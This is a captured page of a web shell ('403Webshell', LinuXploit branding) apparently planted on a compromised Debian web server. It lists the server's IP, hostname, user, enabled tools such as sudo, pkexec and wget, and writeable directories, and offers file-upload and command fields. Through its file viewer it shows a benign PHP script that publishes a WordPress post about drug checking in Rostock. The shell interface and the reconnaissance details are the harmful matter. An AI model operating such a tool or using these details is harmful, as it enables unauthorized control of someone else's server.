403Webshell
Server IP : 202.61.199.114  /  Your IP : 216.73.217.139
Web Server : nginx/1.22.1
System : Linux de.arni-solutions.de 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
User : web20 ( 1018)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/3951577/root/tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/3951577/root/tmp/create_post.php
<?php
define('WP_USE_THEMES', false);
require '/var/www/clients/client2/web20/web/wp-load.php';
$slug = 'drug-checking-rostock';
if ($ex = get_page_by_path($slug, OBJECT, 'post')) { echo "existiert bereits: ID ".$ex->ID."\n"; exit; }
$content = file_get_contents('/tmp/dgt_post_drugchecking.html');
$id = wp_insert_post(array(
  'post_title'   => 'Drug-Checking in Rostock: anonym und kostenlos Substanzen testen lassen',
  'post_name'    => $slug,
  'post_content' => $content,
  'post_excerpt' => 'Stationäres Drug-Checking der Universitätsmedizin Rostock: anonym und kostenlos Substanzen im Labor testen lassen. Termin, Ablauf, angenommene Substanzen und Beratung im Überblick.',
  'post_status'  => 'publish',
  'post_type'    => 'post',
  'post_author'  => 1,
  'comment_status' => 'closed',
), true);
if (is_wp_error($id)) { echo "FEHLER: ".$id->get_error_message()."\n"; exit; }
echo "angelegt: ID $id\n";
echo "Permalink: ".get_permalink($id)."\n";

Youez - 2016 - github.com/yon3zu
LinuXploit